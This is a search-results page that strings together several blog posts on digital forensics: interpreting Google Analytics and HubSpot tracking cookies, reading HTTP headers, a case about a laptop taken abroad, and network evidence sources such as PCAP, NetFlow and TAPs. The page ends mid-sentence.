Search Results

Blog Posts (514)

Other Pages (40)

514 results found with an empty search

Digging into Google Analytics & HubSpot Cookies for Forensics
You know how Google knows what you were thinking before you even typed it? That’s not magic—it’s analytics . Google Analytics and marketing tools like HubSpot leave behind tracking cookies on devices, and guess what? These aren’t just marketing gold—they're digital breadcrumbs that we, as forensic investigators, can use to understand a user’s activity. Let’s break this down like we’re sitting together at a DFIR roundtable. So, What Are These Cookies and Why Do We Care? Google Analytics sets a bunch of cookies that track a user’s interaction with a website. While this helps advertisers figure out where users are coming from and what they do on the site, it also helps us in incident response and digital forensics. The main players in Google’s tracking cookie lineup are: __utma __utmb __utmz (And a few others like utmc, utmt... but let’s keep our eye on the forensic prize.) These cookies are part of what used to be called the Urchin Tracking Module (UTM)—a tech acquired by Google back in 2005. Dissecting the __utma Cookie This one’s a long-liver —with a 2-year expiration date—and super valuable for us . It tells a detailed story about the user's visits to a site. Here’s the format: __utma=..... Example: __utma = 57409013.9999999999.1600000000.1700000000.1710000000.10 Translation: 57409013: Domain hash (keep it the same if on same domain) 9999999999: New unique user ID (any random long number) 1600000000: First visit (timestamp for ~2020) 1700000000: Previous visit (timestamp for ~2023) 1710000000: Current visit (timestamp for ~2024) 10: Now it looks like this user has visited 10 times Why this matters: This gives us a timeline for a user across visits and helps identify repeat behavior. Just keep in mind— different browsers, private mode, or cookie clearing resets this data. So multiple values can exist for the same human. Meet __utmb: The Session Timer This one’s short-lived—just 30 minutes ! It’s all about tracking sessions . __utmb=... Example: __utmb = 57409013.1.10.1720000000 If a user clicks a phishing link, for example, and it triggers some malicious activity, this cookie might help us zero in on when that session started. Meet__utmz: The User’s Path Think of this one as the referral detective . It lasts 6 months and shows how the user landed on the site. __utmz=.... Example: __utmz=57409013.1349969023.3.2.utmcsr=rss1.0mainlinkanon|utmccn=... or __utmz=57409013.1746076800.4.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=buy%20headphones|utmcct=/ This can tell us if they came from 57409013 = same domain hash 1746076800 = timestamp for May 1, 2025 4 = this is the user's 4th visit 3 = their 3rd different traffic source utmcsr=google = source: Google utmccn=(organic) = campaign: organic search utmcmd=organic = medium: organic (vs. referral or direct) utmctr=buy headphones = search keyword utmcct=/ = landed on homepage Why it’s useful: If you’re investigating malware that was delivered via a malvertising campaign or a specific site, this helps reconstruct the user's path . ------------------------------------------------------------------------------------------------------------ Beyond Google: HubSpot Cookies Are Forensic Gold Too Alright, so not every site uses Google Analytics. S ome go with tools like HubSpot , especially in marketing-heavy environments. The key HubSpot cookies: __hstc hubspotutk hsfirstvisit Meet __hstc: HubSpot's Main Tracker This one sticks around for 2 years and tracks repeat visits: __hstc=..... Example: __hstc=104275039.abc1234567890abcdef9876543210abcd.1704067200000.1743465600000.1748649600000.5 You’ve got: Part Value Meaning Domain Hash 104275039 A numeric identifier for your domain, hashed internally by HubSpot. Visitor ID abc1234567890abcdef9876543210abcd A unique ID for the visitor. Looks like an MD5 hash. This is used to identify return visits from the same browser/device. First Visit Timestamp 1704067200000 This is in Unix milliseconds → corresponds to Jan 1, 2024 . Marks the first time this user visited the site. Previous Visit Timestamp 1743465600000 This corresponds to April 1, 2025 . Marks the second-most-recent visit. Current Visit Timestamp 1748649600000 This corresponds to May 31, 2025 . Marks the current visit . Visit Count 5 This is the 5th time the visitor has come to the site. Forensics win: These values give us insight into visit behavior across time, just like Google Analytics, but from a different provider —which might not be blocked or deleted as often. hubspotutk: The Long-Lived Fingerprinter This one is wild—it’s valid for 10 years . Even though its internal structure isn’t documented, this unique value can help us correlate activities across visits and sessions. If we find the same hubspotutk in different cookies across different websites, we may be able to link activity to the same user device. hsfirstvisit: First Contact Also has a 10-year expiration. It shows: How the user got to the site on their first visit A long UNIX-style timestamp (just chop off the last 3 digits to convert) Example: $ date -u -d @1672574400000 date -u -d "2023-01-01 12:00:00" +%s This might tie the user’s first visit to a job posting or email link—even if the page is no longer online. ------------------------------------------------------------------------------------------------------------ Why This Matters in Investigations These tracking cookies can: Help build timelines of activity Correlate a device/user across domains Identify the entry point in phishing or exploit delivery Highlight repeat behavior or anomalous browsing But remember: They’re browser- and session-specific Private mode or cookie clearing wipes them Different browsers = different cookie stores So always combine with browser history , cache , web artifacts , and tools like: Plaso/log2timeline Browser History Capturer KAPE with browser modules ------------------------------------------------------------------------------------------------------------ Wrapping Up Tracking cookies like utma, utmz, and __hstc are often overlooked in forensic investigations. But when interpreted correctly, they provide valuable context that complements log files and system artifacts. So next time you're staring at a blob of cookie data, take a closer look—it might just lead you to a breakthrough in your case. -----------------------------------------Dean-----------------------------------------------
Let's Talk About HTTP – The Backbone of the Web (And a Goldmine for DFIR Folks)
--------------------------------------------------------------------------------------------------- Thanks for all the support on the Wireshark article! https://www.cyberengage.org/post/master-wireshark-tool-like-a-pro-the-ultimate-packet-analysis-guide-for-real-world-analysts I know there are already tons of articles out there on HTTP—but trust me, this one’s different. Give it a read, and you’ll see exactly what I mean. --------------------------------------------------------------------------------------------------- Hey folks Today, let’s take a walk through a protocol that all of us use literally every day —HTTP. Yup, HyperText Transfer Protocol . Even if you’re not a hardcore networking nerd, if you've ever opened a webpage (which, hello, you're doing now!), you’ve used HTTP. But if you're into digital forensics, incident response , or just cybersecurity in general, knowing how HTTP works isn't just a bonus—it’s critical . And trust me, there's a lot more to it than just "the thing that gives me web pages." ------------------------------------------------------------------------------------------------------------ First Things First: What Is HTTP? HTTP is a plaintext protocol , which means it’s readable. You and I can literally look at a packet of HTTP data and figure out what’s going on without needing fancy tools. It’s also stateless , meaning each request doesn’t remember the one before it. Every request stands on its own. This might sound weird at first—like, how does your web browser remember where you left off? That’s where cookies , sessions , and tokens come in (topics for another day 😄). ------------------------------------------------------------------------------------------------------------ Why Should a Forensic Investigator or Incident Responder Care? I’m glad you asked 😎 Whether you're investigating a rogue employee, a full-blown APT, or just checking someone’s shady web browsing, HTTP is going to show up a lot . In fact, you’ll probably run into HTTP traffic in almost every case . Now, here’s the twist: with the rise of full-disk encryption , incognito modes , and BYOD (bring-your-own-device) policies, disk artifacts aren’t always enough . That’s where network data comes in. If you’ve got packet captures (PCAPs) available, you can: Reconstruct entire web sessions Pull down files that were downloaded (think: malware EXEs or phishing pages) Track API calls to remote services Monitor machine-to-machine activity (bots, implants, or automated tools) Detect C2 traffic (command & control) And that’s not just theory. I’ve worked with many malware analysts who help us dissect C2 channels running over HTTP. Even if the attacker encrypted the payload, the URLs, headers, or timing patterns can still tell you a lot. ------------------------------------------------------------------------------------------------------------ Real-Life Use Case: Web Server Compromise Let's say a web server gets popped. Sure, you’ll look at logs and disk evidence. But what if the attacker cleared logs or used living-off-the-land techniques? That’s when HTTP traffic analysis becomes your best friend. By reviewing actual network traffic , you might catch: File uploads via POST Command injections Suspicious API usage Attacker beacons to external servers ------------------------------------------------------------------------------------------------------------ HTTP Versions – It’s Not All 1.1! Okay, here’s a little version history in plain English: HTTP/1.0 – Old-school. One request per connection. HTTP/1.1 – Still widely used. Keeps connections alive. This is what you’ll see most in PCAPs. HTTP/2 – Multiplexed. Multiple requests over one connection. Super common now. HTTP/3 – The future. Built on QUIC (based on UDP), not TCP. Crazy fast. Still being adopted. According to W3Techs (as of now), HTTP/2 is used by over 50% of websites, and HTTP/3 is slowly gaining ground (~10% but growing fast). ------------------------------------------------------------------------------------------------------------ Dissecting an HTTP Request – Let’s Get Nerdy for a Second Here’s a simple GET request: GET /time/1/current?cup2key=9:wz8PuwCb6IQ1sPJTx92bCpndCnsugtTLkdpVppulvZE&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1\r\n Host: clients2.google.com This line breaks down into: GET – Request method cup2key=9:wz8PuwCb6IQ1sPJTx92bCpndCnsugtTLkdpVppulvZE&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 – The URI (Uniform Resource Identifier) (Request Strings) HTTP/1.1 – Protocol version Then you’ve got headers (like Host, User-Agent, Accept, etc.) Fun fact: GET and POST are the most common methods. GET is used to fetch data. POST is used to send data (like login credentials, form data, or file uploads). Here's a quick cheat sheet of other methods: Method What It Does HEAD Like GET, but fetches only headers (no body) PUT Uploads a file or resource DELETE Deletes a resource OPTIONS Asks what methods the server supports TRACE Echoes back the request (used for debugging) CONNECT Used to create a tunnel, often for HTTPS Some of these, like TRACE and CONNECT, are often blocked by firewalls or disabled on servers because of their potential abuse. ------------------------------------------------------------------------------------------------------------ Forensic Tips & Bonus Nuggets HTTP requests can contain query strings (?name=value&foo=bar), which might hold sensitive search terms, login attempts, or injection payloads. Headers like User-Agent, Referer, and Cookie can reveal browser behavior , session IDs, and possible spoofing. When malware uses HTTP as a C2 channel, it often mimics legitimate browser behavior to blend in. Look for anomalies! Some HTTP-based malware also abuses API endpoints , like /api/upload, /checkin, or /status. These are usually dead giveaways in custom C2 protocols. One Last Thing... Not all HTTP traffic is visible today. With HTTPS (the secure version), a lot of the content is encrypted. But don’t worry— the domain (SNI), headers, and timing can still tell you a lot, especially if you're using TLS interception (in legal environments, of course). ------------------------------------------------------------------------------------------------------------ let’s casually break down something that often looks boring but is super powerful when you're into digital forensics, incident response, or even threat hunting— HTTP Request Headers . What’s the Scene? Imagine someone visited metadrive.io . When they did that, their browser quietly made an HTTP request to metadrive.io. What’s interesting is how their browser told the website about itself—and that's where headers come in. Let’s start with the raw request: GET / HTTP/1.1\r\n Host: metadrive.io\r\n Connection: keep-alive\r\n Upgrade-Insecure-Requests: 1\r\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\r\n Accept: text/html, application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *; q=0.8,application/signed-exchange;v=b3;q=0.7\r\n Accept-Encoding: gzip, deflate\r\n Accept-Language: en-US, en; q=0.9\r\n r\n ------------------------------------------------------------------------------------------------------------ Okay, deep breath! Host Header – The MVP of HTTP/1.1 Host: metadrive.io\r\n Why it matters: In HTTP/1.1, the Host header is required . Without it, the server won’t know which website you want—especially important when one server hosts multiple sites. Think of it as the “to:” address on a letter. ------------------------------------------------------------------------------------------------------------ User-Agent – Browser's ID Card (Well, Sort Of) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\r\n What it tells us: This is your browser bragging about who it is. In this case: Browser identified as Chrome 136 on Windows 10 (64-bit) Now here's the kicker: This value is completely customizable . Anyone can spoof it. You and I can literally install browser extensions like User-Agent Switcher and pretend to be Googlebot, Internet Explorer from 2001, or even a toaster (okay, maybe not—but close!). ------------------------------------------------------------------------------------------------------------ Accept Headers – What the Client Wants Accept: text/html, application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *; q=0.8,application/signed- Accept-Encoding: gzip, deflate\r\n Accept-Language: en-US, en; q=0.9\r\n These are pretty straightforward. Accept: What content types the browser can handle (HTML, XML, etc.) Accept-Language: Tells the server the user's preferred languages. Useful for geo-profiling. Accept-Encoding: Whether the browser can handle compressed responses like gzip. Also, note the q value—it shows preference. For instance, q=0.9 means “I like XML, but not as much as plain HTML.” ------------------------------------------------------------------------------------------------------------ Cookies – The Trail of Breadcrumbs (In this example its not there but adding so it will be eays for you) Cookie: prov=...; hubspotutk=...; docs_hero=x; hero=none prov=... – Likely a session or user identification token hubspotutk=... – A HubSpot tracking cookie used for analytics and form submissions docs_hero=x – Possibly a custom flag to track a docs page UI state hero=none – Another UI state flag or feature toggle Cookies are little pieces of data stored by your browser from websites. They're often used to maintain state —which is important because HTTP itself is stateless . Without cookies, every click would feel like starting from scratch. Types of cookies: Session Cookies: Gone when the browser closes. Persistent Cookies: Stick around until they expire (or you delete them). For us forensic folks, cookies can reveal: Logins Tracking IDs User behavior across sessions You’d be surprised how much we can correlate just from cookie IDs. ------------------------------------------------------------------------------------------------------------ Authorization – Base64 and Secrets Authorization: Basic Example: Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz Here’s where you might find credentials. This is Basic Auth and it’s basically (pun intended) the base64 encoding of username:password. So bmV3dXNlcjpzM2NyM3RwYXNz decodes to newuser:s3cr3tpass Modern sites mostly use token-based auth or OAuth, but for internal apps or older services, you still find Basic Auth. When found, it’s gold for an attacker or an investigator. ------------------------------------------------------------------------------------------------------------ X-Forwarded-For – Tracing Real IPs (Kinda) X-Forwarded-For: , If a request passes through proxies, this header might show the original client IP . BUT , it’s easily spoofed. An attacker can just add their own X-Forwarded-For and pretend to come from anywhere (say, an internal IP like 192.168.1.11). Some servers trust this blindly— not good . That’s why this header is a common target in IP-based bypasses . ------------------------------------------------------------------------------------------------------------ Proxy-Authorization – Auth to Use the Proxy Proxy-Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz Like Authorization, but used when a client needs to authenticate to a proxy server. Again, base64—same risks apply. ------------------------------------------------------------------------------------------------------------ Referer (Yeah, It’s Misspelled) – Where You Came From Referer: https://www.cyberengage.org/search?q=forensic This tells the server which page you clicked from. Handy for: Analytics (e.g., “what drove traffic here?”) Security (e.g., detecting CSRF or phishing flows) Investigation (e.g., mapping user navigation paths) Here’s the cool part: if you’re moving from HTTPS → HTTP , browsers are supposed to suppress or truncate this header. But in practice, some browsers still leak enough info to tell where you came from. ------------------------------------------------------------------------------------------------------------ Other Fun Headers Upgrade-Insecure-Requests: 1 → Tells the server “hey, if you support HTTPS, switch me there.” Cache-Control: max-age=0 → Basically says: “Please don’t serve me a cached page; I want it fresh.” ------------------------------------------------------------------------------------------------------------ Dissecting an HTTP Response– Let’s Get Nerdy for a Second So far, we’ve talked a lot about HTTP requests — what the client sends to the server. But now it’s time to flip the script. Let’s talk about what the server sends back in response. Let’s Start from the Top — Status Line Here’s a classic example: HTTP/1.1 200 OK This single line tells you three key things : Protocol Version : HTTP/1.1 — this should match the client’s request version. Status Code : 200 — tells you if the request went okay or something broke. Status Text : OK — human-readable, but the client doesn’t really care what this says. It could say "Success", "All Good", or even "Nice Try Buddy" 😄 — as long as the number is 200, the meaning is the same. 💡 Common Status Codes You Should Know Let me list a few real-world ones we bump into all the time: Code Meaning 100 Continue – Client can keep sending request body 200 OK – Everything’s good 301 Moved Permanently – Resource has a new home 302 Found – Temporary redirect 304 Not Modified – Client’s cached copy is still good 400 Bad Request – Syntax error from client 401 Unauthorized – Need authentication 403 Forbidden – You don’t have permission 404 Not Found – Resource doesn’t exist 407 Proxy Auth Required – You need to auth via proxy 500 Internal Server Error – Oops, something’s broken 503 Service Unavailable – Overload or maintenance 511 Network Auth Required – Seen in public Wi-Fi portals For threat hunters : Seeing lots of 400s from the same IP? That might be scanning/recon. A sudden switch from 500s to 200s during POST requests? Could be SQL injection , where the server backend choked on bad input before the attacker got it right. 🔍 Real Response Header Breakdown Here’s a full sample response: accept-ranges: bytes\r\n content-disposition: attachment\r\n content-length: 1963\r\n content-security-policy: default-src 'none'\r\n server: Google-Edge-Cache\r\n x-content-type-options: nosniff\r\n x-frame-options: SAMEORIGIN\r\n x-xss-protection: 0\r\n x-request-id: c1349dbe-bb51-41bc-a142-e4ba95d94a1c\r\n date: Sat, 24 May 2025 04:26:33 GMT\r\n age: 38934\r\n last-modified: Sat, 24 May 2025 04:24:20 GMT\r\n etag: "45281ea"\r\n content-type: application/octet-stream\r\n alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000\r\n cache-control: public,max-age=86400\r\n coprocessor-response: download-server\r\n \r\n Now let’s decode it like detectives 🕵️: Cache-Control, Expires, and ETag These tell you how caching should work. Cache-Control: private — Only the user’s browser should cache it, not shared proxies. ( if u see Cache-Control: public which means: The response is cacheable by any cache — both the user’s browser and shared caches ) Expires: — When the cache is no longer valid. or max-age=86400 (It remains fresh and reusable for 1 day) ETag: "" — Unique fingerprint for the content; helps compare if content changed. Great for web performance and forensic timeline building . Content-Type and Content-Encoding Tells you what kind of content and how it’s packed: Content-Type: text/html; charset=utf-8 — HTML page in UTF-8 encoding. or content-type: application/octet-stream\r\n =tells the browser (or any client) that the server is sending raw binary data . Content-Encoding: gzip — It's compressed, so your client needs to decompress. Content-Length Size of the actual data (after decompressing, if needed). content-length: 1963: — 1963 bytes. X-Frame-Options: SAMEORIGIN Mitigates clickjacking by saying: “Only I can frame myself!” Date Exact time the response was generated. Useful when reconstructing timelines or tracking malware behavior. date: Sat, 24 May 2025 04:26:33 GMT Investigator Tip: If your endpoint says it made the request at 1:52 PM, but the server's timestamp says it responded at 1:47 PM — you might have clock skew on the client. This can seriously mess with your timeline , so cross-check time sources always. Fun fact: Some malware variants use this Date: header as a seed value for their DGA (Domain Generation Algorithm) — clever, huh? Connection: keep-alive (if found) With HTTP/1.1 , one of the cool upgrades was allowing persistent connections — so your browser could reuse the same TCP session for multiple requests. This reduces overhead and speeds things up. The client tells the server it supports this using:Connection: Keep-Alive If the server agrees, it responds with:Connection: Keep-Alive But if either side wants to close the connection : Connection: close Investigator Tip: If you're monitoring traffic and notice lots of "Connection: close" lines mid-session, it might indicate non-browser activity — like malware making single-use requests. ------------------------------------------------------------------------------------------------------------ What About Redirects? Redirections are handled via a combination of: 300-series status codes (like 301, 302) A Location: header that says: "Hey, go here instead!" These redirects can be abused too. Malware campaigns use redirect chains to mask the origin of malicious content. Forensics tip: Don’t stop at the first hop! ------------------------------------------------------------------------------------------------------------ Pro Tip: Watch Out for X- Headers Both clients and servers can use custom headers that begin with X-. These can carry unique identifiers , debug info , or even tracking tokens . Example: X-Request-Guid: This might help correlate a single session across multiple logs. ------------------------------------------------------------------------------------------------------------ HTTP Headers in Investigations Let’s talk real-world usage. How do these headers help during an actual incident? 1. Pastebin & Data Exfil Attackers often use public paste sites like Pastebin or SendSpace. Some malware is coded to automatically upload exfiltrated data using these services’ APIs. If an attacker has RDP or VNC access, they might just open a browser and manually do it — but the network traffic (HTTP POST requests, User-Agent headers, and API URIs) will still leave footprints. 2. User-Agent Fingerprinting If you're in a corporate environment, there’s probably a known set of legitimate User-Agent strings. Anything else? Could be: Malware Unauthorized browser Portable or dev tools Sometimes, malware adds its own version string in the User-Agent, helping investigators quickly fingerprint infections across the environment . 3. Credential Sniffing in HTTP Basic Auth We touched on this earlier, but just a reminder — Basic Auth sends credentials like this: Authorization: Basic bmV3dXNlcjpzM2NyM3RwYXNz That Base64 string? It’s just user:password. If you’re capturing traffic, you can extract credentials directly. 4. URI Analysis Every URI tells a story. It could be: Web searches Form submissions API calls Malware callbacks Pairing URI analysis with malware analysis gives you powerful insight into what the attacker was trying to do — exfiltrate data, move laterally, connect to command-and-control, or worse. 5. When the Disk Fails, the Network Tells All Modern attackers are smart: They use private browsing They run portable apps from USBs They clean up after themselves So maybe there’s no trace left on the disk . But network traffic? That’s harder to erase. If you have PCAPs or proxy logs, you’ve still got a shot. ------------------------------------------------------------------------------------------------------------ Final Thoughts HTTP headers might seem boring on the surface, but when you dig in — they’re loaded with useful info. From persistent connections to User-Agent strings to caching behavior and time syncing — every bit tells you something. Hope this post made it easier to see headers not as noise, but as gold dust for a forensic investigator. -------------------------------------------------------Dean-------------------------------------------
The Silent Journey: A Cautionary Tale in Cyber Risk
By Dean and Co-founder(Keeping him hidden) N ote: The following is a real-world scenario. While specific details have been redacted for confidentiality, the events, risks, and discussions are authentic and reflect how quickly routine security assumptions can be challenged. ------------------------------------------------------------------------------------------------------------- It was a quiet Friday afternoon when the security team at < Redacted> received a cryptic message that disrupted the stillness: "Just letting you know, I’m traveling to [Redacted: High-Risk Country] for a personal emergency. I have my work laptop with me, but it’s off. I won’t be working remotely. I’ll be back in a few days." No warning. No travel notice. No security protocol followed. The sender was a mid-level employee—someone with access to sensitive communication channels, confidential project documentation, and internal corporate emails. She had simply vanished off the radar with a company-owned device, now located in one of the most surveilled and cyber-hostile environments on Earth. When Silence Isn’t Golden As the message trickled up the chain of command, tension rippled through the team. The endpoint hadn’t checked in. The MDM system showed it as silent . Meanwhile, her personal phone , likely still logged into apps like Slack and Gmail, was live—connected to unknown, unmanaged, and potentially compromised networks. The war room lit up.Discussions intensified. The air was heavy with the weight of unknowns . That’s when the Manager , a cybersecurity veteran, finally spoke up—measured and calm and stated. "Hi @Co-founder," "Should we burn it all down?" Experience Speaks Co-founder leaned back in his chair, gaze steady. “Unless you suspect she’s actively cooperating with the [foreign] government, I don’t think you need to go nuclear. If FileVault is enabled and she confirms that the laptop never left her possession, we have some room for measured response.” His suggestion? Don’t jump to full device wipe—yet.Instead, perform deep threat hunting when the laptop returns. Maybe even plant deception tokens to monitor post-return behavior. But then, his tone shifted. And the room fell silent. “I’ve seen this before. A national from [REDACTED] traveled back home. He was coerced. Pressured. When he returned, credentials started behaving strangely. It turned out, the government had leaned on him to gain access to his employer’s network.But that was a high-profile case—the company had crossed a geopolitical red line.” When to Go Nuclear The Co-founder then delivered a dose of hard-earned wisdom: “Governments don’t waste zero-days lightly. A full-disk encryption bypass? That’s a weapon-grade exploit. If the device wasn’t seized or out of her hands, I’d avoid assuming the worst.” However, he outlined a clear response matrix: If customs had taken the device, even briefly?→ Immediate wipe. No debate. If there’s no evidence of tampering and the device remained in her possession?→ “Wipe sessions. Reset MFA. Change passwords. Hunt hard.” If you suspect cooperation or physical compromise ?→ “Wipe everything. Treat it like a breach.” The Measured Middle Ground His conclusion struck a balance between paranoia and practicality: “I wouldn’t make this the standard response to all international travel. But this? This is how I’d handle it. If wiping the device won’t cause operational disruption, then sure—wipe it. Better safe than sorry.” The team sat in silence again, eyes fixed on the last known signal from the laptop—thousands of miles away. Powered off… or so she said. Is Still Days Away And so the countdown begins.An employee returns soon.But what she’s really bringing back? That’s the question no one can yet answer. A trusted colleague? A compromised asset? Or a sleeper breach waiting to unfold? Stay vigilant. Because sometimes, the quietest events… hide the loudest risks.
Where Do We Begin? A Network Forensic Investigator’s Steps
Forensic Mindset article let’s be honest—when you're knee-deep in a digital forensic investigation or a threat hunting session, one of the biggest challenges is simply knowing where to start . Sometimes you’re lucky. You get a nice clean lead: a suspicious IP, a malware hash, or a user who clicked something shady. But more often than not, someone just comes over and drops the classic: “Something’s off… we don’t know what, but can you check it out?” Frustrating, right? But this is actually where the real DFIR (Digital Forensics and Incident Response) journey begins. ------------------------------------------------------------------------------------------------------------- The Investigative Compass: Ask the Right Questions Here’s what helps me frame my approach—and you might find this helpful too: 1. What was taken? When? Where did it go? How? Who? Classic damage assessment. This is what most stakeholders care about. What data was stolen? When did it happen? Is it still happening? "who did it" isn’t always the most urgent priority . 2. What happened just before and after the incident? Events don’t happen in a vacuum. Context is king. A login from a foreign IP five minutes before the ransomware hit? That matters. Random account creation after an attachment was opened? That’s a clue. Sometimes the thing you’re investigating is just the tip of the iceberg . Looking at the surrounding activity is how you find the rest of it. 3. How did the malware get in? Was it a phishing email? A drive-by download from a shady ad network? A vulnerable web server? You’ll often find these answers in your network logs or proxy data . Knowing how the threat entered helps you close that door and stop the same thing from happening again. 4. What else was happening on the network? This is about scoping. Are there other compromised systems? Are there lateral movements? This is where real hunting begins. A good rule of thumb: if one system is infected, chances are it’s not alone . ------------------------------------------------------------------------------------------------------------- The Most Common Entry Point: Phishing (Yeah, Still) Let’s walk through an all-too-familiar story: User connects to the corporate Wi-Fi. Logs into their domain account. Opens Outlook. Sees an email — looks legit. Clicks a link. Boom. Game over. Here’s what actually happens under the hood: DNS request to the phishing domain. Website serves a drive-by download. User unknowingly runs the payload. It fetches a second-stage malware. Tries connecting to primary C2 — blocked. Falls back to backup C2 — success. This tiny click becomes a pivot point for an entire compromise. Knowing the order of operations helps you know exactly what to look for in logs and network traffic. ------------------------------------------------------------------------------------------------------------- Packet Captures (pcaps): Goldmine or Nightmare? If you’ve worked with network data, you’ve seen .pcap files. These are generated by tools like tcpdump, Wireshark, or npcap (for Windows). But let’s get real—just having a pcap isn’t enough. You’ve got to ask: What interface did the capture come from? Was it a WLAN in managed mode (data frames only)? Or monitor mode (more detailed 802.11 frames)? Knowing how and where the pcap was captured can save you hours of chasing false leads. Also, pcaps are heavy. On high-bandwidth networks, they can get out of hand quickly—moving them, parsing them, even opening them can be painful. ------------------------------------------------------------------------------------------------------------- NetFlow & IPFIX: Metadata Magic If you can’t get full packet captures (because... storage), the next best thing is NetFlow or IPFIX . These are like traffic summaries — you won’t see payloads, but you will see what talked to what, when, and how much. Cisco started it. IPFIX is the open standard. Collectors store the data, analysts query it. It’s best used for large networks where full captures are impractical. For example: if you see 1000 connections from a IOT to an outside IP on port 443... yeah, something’s weird. ------------------------------------------------------------------------------------------------------------- Logs: Trust, but Verify Logs are amazing , but only if you: Hash them the moment you collect them. Store originals in read-only storage. Work only on trimmed-down copies. Label edits and don’t overwrite the originals. Also, retention matters. Sometimes breaches stay hidden for months . If you’re only keeping logs for 30 days, that’s not good enough. A good practice? Match your log retention to your threat landscape. At least a year for critical servers. ------------------------------------------------------------------------------------------------------------- Scoping: What Else Was Happening? After finding malware or a breach, don’t stop there. Ask: Were other systems affected? Is this lateral movement? Is the malware beaconing out? This process — scoping — is crucial . Think of it like a crime scene investigation: don’t just look at the body, look at the entire room. ------------------------------------------------------------------------------------------------------------- let’s slow down and talk about something we often take for granted: how we actually get the traffic in the first place . We usually get excited about libpcap, tcpdump, and Suricata rules (yes, guilty here 🙋‍♂️), but without the right hardware setup, those tools are like a car without wheels. First Stop: The Humble Switch (And Port Mirroring) Let’s start with the network switch . These little workhorses make sure devices talk to the right destinations by segmenting traffic. Great for performance — but bad for traffic visibility. On a switched network, we can’t just plug into a random port and expect to see all the traffic. Switches are too smart for that. So this is were port mirroring to the rescue! Also known as SPAN ports (Switch Port Analyzer). Here’s how it works: The switch duplicates traffic from one or more ports (or even VLANs). It sends that duplicate stream to a specific port you designate. You plug your capture box or sensor into that mirrored port, and boom — you're now watching the action. Why it’s awesome: Already built into most enterprise switches. Zero hardware cost (just configuration). No need to interrupt the network. But there’s a catch: The mirrored port might choke if you throw too much data at it. Even if the switch supports 24 ports at 1Gbps, your SPAN port is still just one 1Gbps link. If traffic exceeds what the mirror port can handle, it can drop packets — or worse, the switch might disable the mirror completely. ------------------------------------------------------------------------------------------------------------- 🛠️ Enter the Network TAP: Built for One Job, and It Nails It When port mirroring isn’t cutting it — we turn to the network TAP . These are hardware devices designed solely to duplicate network traffic. No bells, no whistles — just glorious packets. Different types of TAPs: Basic TAPs Split the traffic into two directions (ingress and egress). You’ll need to reassemble them (called aggregation) using software or another device. Aggregation TAPs Combine both directions into one full-duplex stream — super handy for monitoring from a single interface. Regenerating TAPs They clone traffic to multiple output ports , so you can feed data to multiple sensors or analysis tools at the same time. This is gold during IR when one team might be doing full packet capture while another is looking at behavior or writing detections. ------------------------------------------------------------------------------------------------------------- Cloud’s Not Left Out Either Guess what? Traffic mirroring isn’t just for on-prem anymore. Cloud vendors finally gave us what we need: AWS : Has VPC Traffic Mirroring , which mirrors traffic from ENIs (Elastic Network Interfaces) to a collector. Google Cloud : Offers Packet Mirroring , which works across instances in a VPC. These are awesome for cloud visibility, but remember to monitor your costs — mirroring traffic can rack up bandwidth charges! TAPs vs. Port Mirroring: What You Really Need to Know Feature Port Mirroring (SPAN) Network TAP Cost ✅ Free (built-in) ❌ Expensive Reliability ⚠️ Can drop packets ✅ Rock solid Setup Impact ✅ No downtime ❌ Needs brief downtime Complexity ✅ Simple config ⚠️ Varies with features Use Case 🟡 Light monitoring 🟢 Heavy-duty, IR, forensics ------------------------------------------------------------------------------------------------------------- Let's talk about Network Flow Data . Yup, we’re talking NetFlow, VPC Flow Logs, DNS logging, and all the juicy network breadcrumbs attackers leave behind. Whether you’re responding to a breach or threat hunting proactively, this kind of telemetry is pure gold . What the heck is NetFlow and why should I care? NetFlow is basically metadata about traffic that moves across a network. It won’t show you full packet content (so don’t expect to see passwords or payloads), but i t tells you who talked to who , for how long, how many packets, and how much data . Think of it like your phone bill: you may not hear the convo, but you know who called who, for how long, and from where. ----------------------------------------------------------------------------------------------------------- Where Can You Get Flow Data From? Internal Devices Most routers and firewalls (especially enterprise-grade ones) can export flow logs . Many switches with Layer 3 or 4 capabilities can do this too. Just note: it's often disabled by default , so check that setting first. Want endpoint-level logging? You can configure workstations and servers using tools like: fprobe pmacct nprobe Now, if you’re in the middle of an incident or running a hunting operation, you can even pair these tools with port mirroring to collect flows tactically. Super useful if you want focused visibility without touching every endpoint. ----------------------------------------------------------------------------------------------------------- Cloud Platforms For those running workloads in the cloud: AWS gives you VPC Flow Logs Azure has NSG Flow Logs Google Cloud provides VPC Flow Logs These are cloud-native equivalents of NetFlow and can be integrated right into your detection pipeline. Just remember to tune what’s being logged so you’re not overwhelmed. ----------------------------------------------------------------------------------------------------------- Why Is NetFlow So Useful in IR? Let’s say you detect a suspicious IP today. You can go back and ask: Has this IP connected to us before? What systems did it talk to? Was data sent out (exfiltration)? Is there a pattern of beaconing (C2)? The cool thing is NetFlow data is super fast to query , and because it’s metadata, it's not as sensitive or heavy as full packet capture. That means storage and privacy concerns are much lower. You can also spot odd behavior like: Massive outbound flows → data theft? Repetitive small bursts of traffic → C2? Connections to known bad IPs → APT action? ----------------------------------------------------------------------------------------------------------- Okay, but how do we actually get the logs? Great question. Just because the devices can generate logs doesn’t mean you’ll have access. Many security appliances have painful UI-based exports —especially if they’re managed by an MSSP. You must test the log collection/export mechanism before an incident happens. Can’t access the device? Then make sure the admins can , and fast. Or, better yet, automate the process if possible. If logs are being sent to you from someone else make sure: The logs are secure (in transit and at rest) File formats and sizes are supported Everyone involved knows how to collect and send the data Pro tip: Set up regular drills with your team so that collecting and reviewing logs becomes second nature. ------------------------------------------------------------------------------------------------------------- External Evidence: Often Forgotten, But Invaluable This one’s often overlooked. Your ISP Yep, your ISP may collect 